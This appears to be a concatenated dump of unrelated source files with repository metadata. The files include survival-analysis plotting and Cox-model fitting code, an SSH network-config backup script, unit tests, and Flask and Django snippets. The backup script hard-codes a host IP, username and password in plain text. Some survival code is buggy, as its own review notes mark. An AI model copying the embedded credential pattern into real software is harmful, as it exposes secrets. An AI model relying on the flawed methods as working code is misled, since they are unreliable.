                    showmeans=True,
                    meanprops={'linestyle':'-.'}, #'marker':'*'},
                    sym='+',
                    whis=1.5
                    )
        # Box edge colour = sign of the median; face colour = feature group.
        for i, patch in enumerate(bplot['boxes']):
            patch.set(color=color_b[i], linewidth=1.3)
            patch.set(facecolor = color_c[i])
        for element in [ 'means','medians','fliers']: #['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']
            for i, patch in enumerate(bplot[element]):
                patch.set(color=color_b[i], linewidth=1)
        plt.title(Y_name + ' ' + Model + ' coefs_ ROC Accuracy')
        plt.legend(handles=legend_elements, ncol=ncol_, prop={'size':11}, loc='upper right')
        plt.ylabel(Y_name + ' ' + Model + ' coefs_ values')
        plt.xticks(rotation='270')
        plt.savefig(self.out, bbox_inches='tight')
    def Score_1(self, score ):
        """Plot per-sample risk scores against survival outcome, stacked in
        three panels (scores / OS months / status strip).

        ``score`` is a DataFrame indexed by sample with ``risk_score``,
        ``OS_months`` and ``OS_status_B`` columns, one row per CV repeat.
        The figure is written to ``self.out``.
        """
        # Aggregate the repeated per-sample predictions.
        All_mean = score.groupby([score.index]).mean()
        All_median = score.groupby([score.index]).median()
        All_Score = All_mean[['OS_months', 'OS_status_B']]
        All_Score['risk_score_mean'] = All_mean['risk_score']
        All_Score['risk_score_median'] = All_median['risk_score']
        # Order samples by survival time (then status) along the x axis.
        All_Score.sort_values(by=['OS_months', 'OS_status_B'],
                                ascending=[True, True], inplace=True, axis=0)
        # NOTE(review): debugging dump with a hard-coded file name.
        All_Score.to_csv('bb.xls',sep='\t',index=True)
        #fig, (ax1,ax2,ax3) = plt.subplots(3, 1, figsize=(All_Score.shape[0]/5,13), gridspec_kw={'wspace': 0, 'hspace': 0}, sharex=True)
        plt.figure(figsize=(All_Score.shape[0]/5,13))
        #fig.suptitle('coefs_ importance ROC Accuracy', x=0.5 )
        #fig.subplots_adjust(0.05,0.2,0.87,0.95)
        # Top panel (10/13 of the height): aggregated and raw risk scores.
        ax1 = plt.subplot2grid((13, 1), (0, 0), rowspan=10)
        ax1.plot(All_Score['risk_score_mean'], 'r--', marker='*', linewidth=1.3, markersize=4.2, label='risk_score_mean')
        ax1.plot(All_Score['risk_score_median'], 'b:' , marker='^', linewidth=1.3, markersize=4.2, label='risk_score_median')
        ax1.scatter(score.index, score['risk_score'], c='g', marker='o', s=15.2)
        ax1.set_xticks([])
        # Middle panel: overall-survival months per sample.
        ax2 = plt.subplot2grid((13, 1), (10, 0), rowspan=2)
        ax2.plot(All_Score['OS_months'], 'k-' , marker='s', linewidth=1.5, markersize=4.2, label='risk_score_median')
        #ax1.scatter(score.index, score['risk_score'], c='g', marker='o', s=15.2)
        # Bottom strip: event status rendered as a heat band.
        ax3 = plt.subplot2grid((13, 1), (12, 0), rowspan=1)
        ax3.pcolor(All_Score[['OS_status_B']].T, cmap=plt.cm.summer)
        ax3.set_yticks([])
        ax3.set_ylabel('OS_status')
        #ax3.legend()
        plt.xticks(rotation='270')
        plt.savefig( self.out ) #,bbox_inches='tight')
        plt.close()
    def Score_(self, score ):
        """Same data as ``Score_1`` drawn with an explicit GridSpec: status
        strip on top, survival months in the middle, risk scores (mean /
        median / all CV repeats) at the bottom.  Saved to ``self.out``.
        """
        All_mean = score.groupby([score.index]).mean()
        All_median = score.groupby([score.index]).median()
        All_Score = All_mean[['OS_months', 'OS_status_B']]
        All_Score['risk_score_mean'] = All_mean['risk_score']
        All_Score['risk_score_median'] = All_median['risk_score']
        All_Score.sort_values(by=['OS_months', 'OS_status_B'],
                                ascending=[True, True], inplace=True, axis=0)
        # NOTE(review): debugging dump with a hard-coded file name.
        All_Score.to_csv('bb.xls',sep='\t',index=True)
        # Local import keeps gridspec out of the module namespace elsewhere.
        import matplotlib.gridspec as gridspec
        fig = plt.figure(figsize=(All_Score.shape[0]/5,13) )
        fig.suptitle('coefs_ importance ROC Accuracy', x=0.5,y =0.92 )
        gs = gridspec.GridSpec(13, 1)
        # Row 0: event-status heat strip.
        ax1 = plt.subplot(gs[:1, :])
        ax1.pcolor(All_Score[['OS_status_B']].T, cmap=plt.cm.summer)
        ax1.set_xticks([])
        ax1.set_ylabel('OS_status')
        # Rows 1-2: survival months with a status backdrop.
        ax2 = plt.subplot(gs[1:3, :])
        ax2.grid(True)
        ax2.plot(All_Score['OS_months'], 'c-' , marker='s', linewidth=1.5, markersize=4.2, label='risk_score_median')
        ax2.pcolor(All_Score[['OS_status_B']].T, cmap=plt.cm.winter)
        ax2.set_xticks([])
        ax2.set_ylabel('OS_months')
        ax2.grid(which='major', axis='both')
        # Remaining rows: aggregated and per-repeat risk scores.
        ax3 = plt.subplot(gs[3:14, :] )
        ax3.plot(All_Score['risk_score_mean'], 'r--', marker='*', linewidth=1.3, markersize=4.2, label='risk_score_mean')
        ax3.plot(All_Score['risk_score_median'], 'b:' , marker='^', linewidth=1.3, markersize=4.2, label='risk_score_median')
        ax3.scatter(score.index, score['risk_score'], c='g', marker='o', s=15.2, label='risk_score_all')
        ax3.set_xticklabels( All_Score.index, rotation='270')
        ax3.set_ylabel('risk_scores')
        ax3.set_xlim(All_Score.index[0], All_Score.index[-1])
        ax3.legend()
        plt.savefig( self.out ,bbox_inches='tight')
        plt.close()
    def scor_S(score):
        # NOTE(review): declared at method indentation but without ``self``;
        # it only works when called unbound with the DataFrame as the sole
        # argument — confirm whether ``self`` was meant to be here.  Also
        # relies on ``np``, which this file imports further down.
        """Aggregate per-sample risk scores (plain and exponentiated, i.e.
        hazard-ratio scale) and dump the table to the hard-coded 'aa.xls'."""
        All_mean = score.groupby([score.index]).mean()
        All_median = score.groupby([score.index]).median()
        All_Score = All_mean[['OS_months', 'OS_status_B']]
        All_Score['risk_score_mean'] = All_mean['risk_score']
        All_Score['risk_score_median'] = All_median['risk_score']
        All_Score['exp_risk_score_mean'] = np.exp(All_mean['risk_score'])
        All_Score['exp_risk_score_median'] = np.exp(All_median['risk_score'])
        All_Score.to_csv('aa.xls',sep='\t',index=True)
#file = r'C:\Users\lenovo\Desktop\MLSurvival\MLtest\Result\CoxPH\03ModelFit\CoxPH_S_OS_months_Survival_coefficients.xls'
#dataf= pd.read_csv(file, header=0, index_col='Sample', encoding='utf-8', sep='\t').fillna(np.nan)
#print(dataf.head())
#group=r'C:\Users\lenovo\Desktop\MLSurvival\MLtest\Data.222.25.group.txt'
#group=r'~/Desktop/MLSurvival/MLtest/Data.222.25.group.txt'
#Xg = opens(group)
#print(Xg.head())
#MPlot('aa.pdf').Feature_Import_box(dataf, Xg, 'coef_', 'OS_months', 'CoxPH', sort_by_group=False)
#score=r'C:\Users\lenovo\Desktop\MLSurvival\MLtest\Result\CoxPH\03ModelFit\CoxPH_S_OS_months_Survival_TrainTest_risk_score.detail.xls'
#score=r'~/Desktop/MLSurvival/MLtest/Result/CoxPH/03ModelFit/CoxPH_S_OS_months_Survival_risk_score.xls'
#MPlot('aa.pdf').Score_(score)
#score=r'C:\Users\lenovo\Desktop\MLSurvival\MLtest\Result\CoxPH\03ModelFit\CoxPH_S_RFS_months_Survival_TrainTest_risk_score.final.xls'
#score=r'~/Desktop/MLSurvival/MLtest/Result/CoxPH/03ModelFit/CoxPH_S_OS_months_Survival_risk_score.xls'
#score= pd.read_csv(score, header=0, index_col='Sample', encoding='utf-8', sep='\t').fillna(np.nan)
#print(score)
from sksurv.datasets import load_veterans_lung_cancer
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sksurv.nonparametric import kaplan_meier_estimator
from sksurv.preprocessing import OneHotEncoder
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
from lifelines.statistics import logrank_test
from lifelines import CoxPHFitter
from sksurv.linear_model import CoxPHSurvivalAnalysis, CoxnetSurvivalAnalysis
from sksurv.nonparametric import kaplan_meier_estimator
def NotParamete(df, event, time, term):
    """Log-rank cut-point scan plus a univariate Cox fit for one covariate.

    For every percentile cut of ``df[term]`` (10th-90th) the cohort is split
    at the cut and a log-rank test is run.  ``results`` is rebound on each
    iteration, so only the test for the *last* cut-point is printed at the
    end and returned.  A CoxPH model on ``term`` is also refitted and its
    summary printed on every iteration.
    """
    cph = CoxPHFitter()
    # Candidate cut-points: unique percentiles between the 10th and 90th.
    cheakpoint = np.unique( np.percentile(df[term] , np.linspace(10, 90, 99)) )
    for ic in cheakpoint:
        # Boolean split: samples at/above the current cut vs below it.
        point = (df[term] >= ic)
        T1 = df[point][time]
        E1 = df[point][event]
        T2 = df[~point][time]
        E2 = df[~point][event]
        results = logrank_test(T1, T2, event_observed_A=E1, event_observed_B=E2)
        # NOTE(review): this fit does not depend on ``ic`` — it is
        # loop-invariant work repeated on every iteration.
        cph.fit(df[[event, time, term]], time, event)
        cph.print_summary()
        print(cph.hazard_ratios_, cph.score_)
    print(results.p_value)
    return(results)
def COX():
    """Build a CoxPH estimator plus its grid-search parameter space.

    Returns
    -------
    tuple
        ``(estimator, parameters)`` where ``estimator`` is an unfitted
        ``CoxPHSurvivalAnalysis`` and ``parameters`` is a dict suitable
        for ``GridSearchCV`` (mirrors the shape returned by ``NET``).
    """
    estimator = CoxPHSurvivalAnalysis(alpha=0.5, n_iter=100, tol=1e-09, verbose=0)
    # BUG FIX: the original had a trailing comma after the closing brace,
    # which silently made ``parameters`` a one-element tuple ``({...},)``
    # instead of the dict that GridSearchCV expects.
    parameters = { 'alpha'  : [0, 1e-5, 1e-4, 1e-3, 1e-2, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1],
                   'n_iter' : [300],
                   'tol'    : [1e-09],
                   'verbose': [0] }
    return ( estimator, parameters )
def NET():
    """Return an unfitted Coxnet (elastic-net Cox) estimator together with
    the hyper-parameter grid explored by the search driver."""
    # Hyper-parameter search space for GridSearchCV.
    grid = {
        'n_alphas'          : [50, 80, 100, 200, 500, 700, 1000],
        'alphas'            : [None],
        'alpha_min_ratio'   : [0.0001],
        'l1_ratio'          : np.arange(0.01, 1, 0.01),
        'penalty_factor'    : [None],
        'normalize'         : [False],
        'copy_X'            : [True],
        'tol'               : [1e-07],
        'max_iter'          : [100000],
        'verbose'           : [False],
        'fit_baseline_model': [False],
    }
    # Baseline estimator with explicit defaults (refined by the grid search).
    model = CoxnetSurvivalAnalysis(
        n_alphas=1000,
        alphas=None,
        alpha_min_ratio=0.0001,
        l1_ratio=0.5,
        penalty_factor=None,
        normalize=False,
        copy_X=True,
        tol=1e-07,
        max_iter=100000,
        verbose=False,
        fit_baseline_model=False,
    )
    return (model, grid)
#Data=r'C:\Users\lenovo\Desktop\MLSurvivalv0.01\test\Result\CoxPH\02FeatureSLT\CoxPH_S_OS_months_Survival_FeatureSLT.Data.xls'
# --- Script-level setup: load the feature-selected survival table. ---
Data = r'./test/Result/CoxPH/02FeatureSLT/CoxPH_S_OS_months_Survival_FeatureSLT.Data.xls'
DF = pd.read_csv(Data, header=0, index_col='Sample', encoding='utf-8', sep='\t').fillna(np.nan)
# Survival outcome column names; every other column is a covariate.
_S_Time= 'OS_status'
_T_Time= 'OS_months'
_Xa = [i for i in DF.columns if i not in [_S_Time, _T_Time]]
# Boolean event indicator (status > 0 means the event was observed).
DF[_S_Time +'_B'] = DF[_S_Time].apply(lambda x: True if x >0 else False)
# Structured (event, time) record array — the target format scikit-survival expects.
Y_df = DF[[_S_Time+'_B', _T_Time ]].to_records(index = False)
print(DF.describe())
# Reference fit with lifelines' CoxPH for comparison with the sksurv models below.
cph = CoxPHFitter(alpha=0.05, tie_method='Efron', penalizer=0.5, strata=None)
cph.fit( DF[ _Xa + [_S_Time, _T_Time ]], _T_Time, _S_Time )
cph.print_summary()
print(cph.score_)
def COX_(cox):
    """Fit the CoxPH estimator produced by ``COX()`` on the module-level
    data and print its coefficients, hazard ratios and concordance."""
    estimator, _grid = cox
    estimator.fit(DF[_Xa], Y_df)
    coefs = estimator.coef_
    print(coefs, np.exp(coefs), estimator.score(DF[_Xa], Y_df))
#COX_(COX())
import matplotlib
matplotlib.use('TkAgg')
#matplotlib.use('MacOSX')
import matplotlib.pyplot as plt
from sklearn.model_selection import (StratifiedShuffleSplit, LeaveOneOut, StratifiedKFold,
RepeatedKFold, RepeatedStratifiedKFold, train_test_split,
GridSearchCV, RandomizedSearchCV )
from sklearn.utils import safe_sqr
def NET_(net):
    """Manual alpha scan for Coxnet: fit once over the whole alpha path,
    re-score at every single alpha, then refit at the best-scoring one.

    Returns ``(alphas, coefficient_path.T)`` from the initial full-path fit.
    The bare numeric arguments in the prints are ad-hoc debug markers.
    """
    cphe, cphp = net
    # Initial fit over the full regularisation path.
    cphe.fit(DF[_Xa], Y_df)
    print(cphe.coef_.shape, cphe.alphas_,1111) # np.exp(cphe.coef_), cphe.score(DF[_Xa], Y_df))
    print(cphe.coef_[:, -1], 2222)
    print(cphe.predict(DF[_Xa]),999999999999999999)
    #print(cphe.coef_)
    #plt.plot(cphe.alphas_, safe_sqr(cphe.coef_).T)
    #plt.plot(cphe.alphas_,cphe.deviance_ratio_)
    # Keep the path (alphas + coefficients) from the initial fit for return.
    aa = cphe.alphas_
    bb = cphe.coef_.T
    scorcs= []
    print(cphe)
    print(cphe.score(DF[_Xa], Y_df),22222)
    # Refit at every single alpha and record the concordance score.
    for i in aa:
        cphe.set_params(alphas= [i])
        cphe.fit(DF[_Xa], Y_df)
        scorcs.append(cphe.score(DF[_Xa], Y_df))
    #print( aa, scorcs)
    #plt.plot(aa,scorcs)
    #plt.show()
    scorcs = np.array(scorcs)
    print(np.where(scorcs==scorcs.max()), scorcs[np.where(scorcs==scorcs.max())], 3333333333)
    # Final refit at the best-scoring alpha(s) found by the scan.
    aa_best= aa[np.where(scorcs==scorcs.max())]
    cphe.set_params(alphas= aa_best)
    cphe.fit(DF[_Xa], Y_df)
    print( cphe.score(DF[_Xa], Y_df) ,55555555555)
    print( cphe.coef_, 6666666666)
    print( cphe.predict(DF[_Xa]),999999999999999999)
    return (aa, bb )
# Run the manual Coxnet alpha scan defined above; keep its path for plotting.
cbs_, ccf_ = NET_(NET())
def SNet_():
    """Demonstrate a Coxnet subclass that, after fitting, pins ``coef_`` to
    the alpha with the best deviance ratio; returns ``(alphas, coefs.T)``."""
    class CoxnetSurvivalAnalysis_(CoxnetSurvivalAnalysis):
        #def __init__(self, **kwargs):
        #    #super().__init__()
        #    CoxnetSurvivalAnalysis.__init__(self)
        #    #super(CoxnetSurvivalAnalysis, self).__init__()
        #    self.coefs_ = ''
        def fit(self, X, y):
            # Fit the full regularisation path, then remember which column
            # (alpha index) maximises the deviance ratio.
            super(CoxnetSurvivalAnalysis_, self).fit(X, y)
            self.max_id = np.where( self.deviance_ratio_ == self.deviance_ratio_.max() )
            # Keep the full path in coefs_ and expose the best column as coef_.
            self.coefs_ = self.coef_
            self.coef_ = self.coefs_[:, self.max_id[-1] ]
            self.alphab_ = self.alphas_[self.max_id[-1]]
            return self
        def _get_coef(self, alpha):
            # NOTE(review): ``check_is_fitted`` is not imported anywhere in
            # this file's visible scope — this would raise NameError if hit.
            check_is_fitted(self, "coef_")
            if alpha is None:
                coef = self.coef_[:, -1]
            else:
                coef = self._interpolate_coefficients(alpha)
            return coef
        def predict(self, X):
            # NOTE(review): missing ``return`` — this override always yields
            # None; also the call below passes an ``alpha=`` kwarg that this
            # signature does not accept.  Confirm the intended signature.
            super(CoxnetSurvivalAnalysis_, self).predict(X, alpha=self.alphab_)
    cphe = CoxnetSurvivalAnalysis_( n_alphas=1000,
                        alphas=None,
                        alpha_min_ratio=0.0001,
                        l1_ratio=0.5,
                        penalty_factor=None,
                        normalize=False,
                        copy_X=True,
                        tol=1e-07,
                        max_iter=100000,
                        verbose=False,
                        fit_baseline_model=False,
                        )
    cphe.fit(DF[_Xa], Y_df)
    print( cphe.score(DF[_Xa], Y_df ) ,55555555555)
    print(cphe.max_id, 23232323, cphe.coef_, cphe.coefs_.shape) # np.exp(cphe.coef_), cphe.score(DF[_Xa], Y_df))
    print(cphe.predict(DF[_Xa], alpha = cphe.max_id),9999999999999)
    return (cphe.alphas_, cphe.coefs_.T )
als_ , cs_ = SNet_()
# Side-by-side comparison of the coefficient paths from NET_ (left) and SNet_ (right).
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10,10), gridspec_kw={'wspace': 0.1} ) #, sharex=True)
ax1.plot(cbs_, ccf_ )
ax2.plot(als_ , cs_ )
plt.show()
def Grid(NET):
    """Grid-search the Coxnet hyper-parameters, then re-score the fitted
    best estimator at every alpha on its regularisation path and refit at
    the best one.  Exploratory code; numeric print arguments are debug tags.
    """
    estimator, parameters = NET
    clf = GridSearchCV( estimator, parameters,
                n_jobs=-1,
                cv=5,
                scoring=None,
                error_score = np.nan,
                return_train_score=True,
                refit = True,
                iid=True)
    clf.fit(DF[_Xa], Y_df)
    scor_ = clf.score(DF[_Xa], Y_df)
    print(clf.best_params_)
    print(clf.best_estimator_.coef_.shape, clf.best_estimator_.alphas_) # np.exp(cphe.coef_), cphe.score(DF[_Xa], Y_df))
    #print(clf.predict(DF[_Xa]))
    print(scor_, 1111111111)
    # Alpha path of the refitted best estimator.
    aa = clf.best_estimator_.alphas_
    '''
    from copy import copy
    es = copy( clf.best_estimator_ )
    ps = {"alphas": [[v] for v in aa]}
    glf = GridSearchCV( es , ps ,
                n_jobs=-1,
                cv=5,
                scoring=None,
                error_score = np.nan,
                return_train_score=True,
                refit = True,
                iid=True)
    glf.fit(DF[_Xa], Y_df)
    print(glf.score(DF[_Xa], Y_df), 2222222222)
    print(glf.best_estimator_.alphas_, 2222222222)
    '''
    plt.plot(aa, clf.best_estimator_.deviance_ratio_)
    # Re-score the best estimator refitted at each single alpha.
    scorcs= []
    for i in aa:
        # NOTE(review): ``clfa`` aliases (does not copy) the best estimator,
        # so these refits mutate ``clf.best_estimator_`` in place.
        clfa = clf.best_estimator_
        clfa.set_params(alphas= [i])
        clfa.fit(DF[_Xa], Y_df)
        scorcs.append(clfa.score(DF[_Xa], Y_df))
    print(len( scorcs) , len(aa), 44444)
    scorcs = np.array(scorcs)
    print(np.where(scorcs==scor_), scorcs[np.where(scorcs==scor_)], 222222222)
    print(np.where(scorcs==scorcs.max()), scorcs[np.where(scorcs==scorcs.max())], 3333333333)
    # Refit once more at the best alpha(s) from the scan.
    aa_best= aa[np.where(scorcs==scorcs.max())]
    clfn = clf.best_estimator_
    clfn.set_params(alphas= aa_best)
    clfn.fit(DF[_Xa], Y_df)
    print( clfn.score(DF[_Xa], Y_df) ,55555555555)
    print( clfn.coef_, 6666666666)
    # Re-run the grid search with the alpha grid restricted to the winner.
    parameters_n = parameters
    parameters_n['alphas'] = [ aa_best]
    print(parameters_n)
    clf_p = GridSearchCV( clf.best_estimator_, parameters_n,
                n_jobs=-1,
                cv=5,
                scoring=None,
                error_score = np.nan,
                return_train_score=True,
                refit = True,
                iid=True)
    clf_p.fit(DF[_Xa], Y_df)
    scor_p = clf_p.score(DF[_Xa], Y_df)
    print(scor_p)
    '''
    plt.plot(aa,scorcs, label='each')
    #plt.plot(aa,scor_, label='all')
    plt.xlim([0.01,0.020])
    plt.ylim([0.78,0.82])
    plt.show()
    '''
#Grid(NET()) | [
"zhou.wei@genecast.com.cn"
] | zhou.wei@genecast.com.cn |
cf23584d33bfce84f66ef72be8a26832c836ce80 | faaee65a7392744238690fec6bf6dc273e17f7a6 | /backupsw/backup.py | 30c876771ab15c0e3e346b35b447abb639b9882e | [] | no_license | qingyunha/anchnet | 84df043ddee6a464462d5ce53a8e425f86a35330 | b6365693e049cd5852af35c41738599ac5d0f88e | refs/heads/master | 2021-01-19T03:10:41.008609 | 2016-07-26T16:12:35 | 2016-07-26T16:12:35 | 48,851,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 580 | py | import os
from os import path
from datetime import date
from ssh import sshClient
# Root directory under which per-host backup folders are created.
BACKUP_FOLDER = "data"
def backup(host, user, passwd):
    """Fetch the running configuration from *host* over SSH and store it
    under ``BACKUP_FOLDER/<host>/<YYYY-MM-DD>.txt``.

    If the device returns an empty/falsy configuration, nothing is written.
    """
    today = date.today()
    client = sshClient(host, user, passwd)
    config = client.run("DISPLAY_CONFIG")
    if config:
        host_dir = path.join(BACKUP_FOLDER, host)
        if not path.exists(host_dir):
            os.mkdir(host_dir)
        filename = "{0!s}.txt".format(today)
        # BUG FIX: use a context manager so the file handle is closed even
        # if the write fails (the original leaked the handle on error).
        with open(path.join(host_dir, filename), "wb") as f:
            f.write(config)
if __name__ == "__main__":
    # Ad-hoc manual run against a single device (credentials hard-coded).
    backup('10.155.1.211', 'sunc', 'www.51idc.com')
| [
"root@ubuntu.anchnet"
] | root@ubuntu.anchnet |
7c421c57614eaf8a0166b2cb606e6186fb0a4dec | 0f14296a33878c609a7fa2f714146f3a3a3865b2 | /DroneFramework/test/testDataGPS.py | 15fee293428231d7c339837ed9bc814f9cf015dc | [] | no_license | eduardodisanti/drone_control | 8579b7fa2e7706625f5e889e443e4c986d26e591 | 47253c7cd62ccdb84c34e135697b3c6735934d16 | refs/heads/master | 2020-06-12T11:27:21.883690 | 2016-05-23T15:20:29 | 2016-05-23T15:20:29 | 194,284,926 | 1 | 0 | null | 2019-06-28T14:13:30 | 2019-06-28T14:13:30 | null | UTF-8 | Python | false | false | 1,331 | py | import unittest
from hal.sensorDataGPS import SensorDataGPS
from datetime import *
data = {'latitud': 543, 'longitud': 345, 'altitud': 656}
class SensorDataGPSTest(unittest.TestCase):
    """Unit tests for SensorDataGPS: data accessors/mutators and the
    timestamp ("age") accessors."""

    def setUp(self):
        # Fresh sensor reading per test, stamped with the current time.
        self.dataGPS = SensorDataGPS(data, datetime.today())

    def test_getData_NoNone(self):
        self.assertIsNotNone(self.dataGPS.getData())

    def test_getData_Latitud(self):
        self.assertEqual(self.dataGPS.getData()['latitud'], data['latitud'])

    def test_getData_Longitud(self):
        self.assertEqual(self.dataGPS.getData()['longitud'], data['longitud'])

    def test_getData_altitud(self):
        self.assertEqual(self.dataGPS.getData()['altitud'], data['altitud'])

    def test_getData(self):
        self.assertEqual(self.dataGPS.getData(), data)

    def test_setData(self):
        dataGPS = self.dataGPS
        new_data = {'latitud': 234, 'longitud': 178, 'altitud': 756}
        dataGPS.setData(new_data)
        self.assertEqual(dataGPS.getData(), new_data)

    def test_getAge(self):
        # BUG FIX: this test previously re-checked getData(); it now
        # exercises getAge() as its name promises.
        self.assertIsNotNone(self.dataGPS.getAge())

    def test_setAge(self):
        dataGPS = self.dataGPS
        new_age = datetime.today()
        dataGPS.setAge(new_age)
        # assertEqual replaces the deprecated assertEquals alias
        # (removed in Python 3.12).
        self.assertEqual(dataGPS.getAge(), new_age)
"eduardo.disanti@gmail.com"
] | eduardo.disanti@gmail.com |
4977e964f6a721f8ea57369593d991f4cafa79f4 | 13259e2e7d17cc68b0e9b5fc8cb94e66e13bd666 | /catkin_ws/build/catkin_generated/order_packages.py | c28f4543128ca1aa414364df35a5521529847279 | [] | no_license | AnirudhSundar4597/AuE893Spring21_AnirudhSundar | f80310edc507d8d36e93deaf1706b905e786bb08 | a6af95e6e660db561221f692283b796a717d9c95 | refs/heads/master | 2023-04-01T20:12:50.095351 | 2021-04-07T23:06:04 | 2021-04-07T23:06:04 | 333,598,202 | 0 | 2 | null | 2021-02-07T21:38:10 | 2021-01-28T00:24:19 | Makefile | UTF-8 | Python | false | false | 424 | py | # generated from catkin/cmake/template/order_packages.context.py.in
# Values injected by catkin's template; regenerated on every configure —
# edit the template, not this file.
source_root_dir = '/home/anirudh/git_ws/AuE893Spring21_AnirudhSundar/catkin_ws/src'
# Empty whitelist/blacklist -> all packages in the source space are considered.
whitelisted_packages = ''.split(';') if '' != '' else []
blacklisted_packages = ''.split(';') if '' != '' else []
# Chained devel/install spaces this workspace overlays.
underlay_workspaces = '/home/anirudh/AuE8930_Anirudh/devel;/opt/ros/noetic'.split(';') if '/home/anirudh/AuE8930_Anirudh/devel;/opt/ros/noetic' != '' else []
| [
"sundar@clemson.edu"
] | sundar@clemson.edu |
deae7399994f02fc02cd2a1de41c3876a0a42f3d | d5005de630cbfcac46b6f90be845a827a029ff0d | /urlshortner/api/serializer.py | c040926e02219c805df9c6c192f55d7729c0b142 | [] | no_license | mahinm20/url-shortner | d4b18917a002aa12f4fdd1f6f3e2bf026b34f0ad | ea084f96136d5810b8ad6d53bf0acc1a8291b782 | refs/heads/master | 2023-08-11T07:35:04.804424 | 2021-09-14T09:37:27 | 2021-09-14T09:37:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | from django.db.models import fields
from rest_framework.serializers import ModelSerializer
from .models import Link
class LinkSerializer(ModelSerializer):
    """DRF serializer exposing every field of the ``Link`` model."""
    class Meta:
        # '__all__' mirrors every model field; tighten this list if the
        # API should hide internal columns.
        model=Link
        fields='__all__'
| [
"mahinmalhotra20@gmail.com"
] | mahinmalhotra20@gmail.com |
783d9eaf39f755988c056cbfc471d7f851e2376f | dbcf98b6e62363aae0c27873494b31a87fc66b72 | /search/__init__.py | 801b8e09a375dbd1a270d7670eba10025485a202 | [] | no_license | cfannybf/be_nomad | b5c999c2dff89892d27a058809e516bbf74b7598 | be997e22678f62e512f9a09f776d9ac475f3b610 | refs/heads/master | 2022-08-26T12:13:02.682020 | 2020-05-18T18:58:26 | 2020-05-18T18:58:26 | 190,804,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | from search.stack_overflow import *
from search.search_base import *
from search.stack_overflow_parser import *
from search.remoteok_parser import *
from search.remoteok import *
from search.wework import *
from search.wework_parser import *
| [
"noreply@github.com"
] | noreply@github.com |
c6755d3c49392ed98bf5598dd336b05f2b3d11fc | 296f091643221e821fc54edf3abe107701ea5394 | /app/forms.py | 5f2badb5df4cf951dc15f385e5859ec61d7fa957 | [
"Apache-2.0"
] | permissive | koksalkapucuoglu/MicroBlogwFlask | 4335ffab64950286e1b902fc36b573c99103c5c8 | fe9904d4a350c1a3e808c65122f6f9d4b11380c1 | refs/heads/master | 2023-08-20T08:53:55.097219 | 2021-09-28T19:22:35 | 2021-09-28T19:22:35 | 325,088,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField, TextAreaField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, Length
from app.models import User
class LoginForm(FlaskForm):
    """Sign-in form: credentials plus a remember-me flag."""
    username = StringField('Username', validators=[DataRequired()])
    password = PasswordField('Password', validators=[DataRequired()])
    remember_me = BooleanField('Remember Me')
    submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
    """New-account form.

    WTForms automatically invokes the ``validate_<fieldname>`` methods
    below during ``form.validate()``, enforcing unique username/e-mail.
    """
    username = StringField('Username', validators=[DataRequired()])
    email = StringField('Email', validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    # Must match the first password field exactly.
    password2 = PasswordField(
        'Repeat Password', validators=[DataRequired(), EqualTo('password')])
    submit = SubmitField('Register')
    def validate_username(self, username):
        # Reject usernames already present in the database.
        user = User.query.filter_by(username=username.data).first()
        if user is not None:
            raise ValidationError('Please use a different username.')
    def validate_email(self, email):
        # Reject e-mail addresses already present in the database.
        user = User.query.filter_by(email=email.data).first()
        if user is not None:
            raise ValidationError('Please use a different email address.')
class EditProfileForm(FlaskForm):
    """Profile editor: lets a user keep their current username while still
    rejecting usernames taken by anyone else."""
    username = StringField('Username', validators=[DataRequired()])
    about_me = TextAreaField('About me', validators=[Length(min=0, max=140)])
    submit = SubmitField('Submit')
    def __init__(self, original_username, *args, **kwargs):
        super(EditProfileForm, self).__init__(*args, **kwargs)
        # Remember the pre-edit username so an unchanged name passes.
        self.original_username = original_username
    def validate_username(self, username):
        # Only hit the database when the name actually changed.
        if username.data != self.original_username:
            user = User.query.filter_by(username=self.username.data).first()
            if user is not None:
                raise ValidationError('Please use a different username.')
class EmptyForm(FlaskForm):
    """Form containing only a submit button, for POST actions that need
    no input fields."""
    submit = SubmitField('Submit')
"koksalkapucuoglu@hotmail.com"
] | koksalkapucuoglu@hotmail.com |
3a2e7b9af3dd389ece469119d3a337902f903c4b | 9ac33eada39f98bc680ba7b483a2504cfbb8a5a9 | /MNIST_EXAMPLE.py | 2ea2b7ff73ad9339de29e6731e97200f5f085c2b | [] | no_license | ZhouNan1212/DeepLearning | 600e8e03085ec6f610a91942ea74d03f03b62bba | 5ad85fa9629e1cfc16ef6af6e2ce4c7d32882be6 | refs/heads/master | 2021-08-18T16:45:21.063850 | 2017-11-23T09:43:33 | 2017-11-23T09:43:33 | 111,786,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,230 | py | # -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# Load the MNIST data set (one-hot labels; downloaded on first use).
mnist = input_data.read_data_sets("./MNIST_data/", one_hot=True)
print "Training data size: ", mnist.train.num_examples
# NOTE(review): the next two prints reuse the "Training" caption but
# actually report the validation and test split sizes.
print "Training data size: ", mnist.validation.num_examples
print "Training data size: ", mnist.test.num_examples
batch_size = 100
xs, ys = mnist.train.next_batch(batch_size)
# Draw batch_size examples from the training split.
print "X shape:", xs.shape
print "Y shape:", ys.shape
# MNIST dimensions: 28x28 images flattened to 784 inputs, 10 classes.
INPUT_NODE = 784
OUTPUT_NODE = 10
# Network and training hyper-parameters.
LAYER1_NODE = 500
BATCH_SIZE = 100
LEARNING_RATE_BASE = 0.8 # base learning rate
LEARNING_RATE_DECAY = 0.8 # learning-rate decay factor
REGULARIZATION_RATE = 0.0001 # L2 regularisation coefficient
TRAINING_STEPS = 30000 # number of training steps
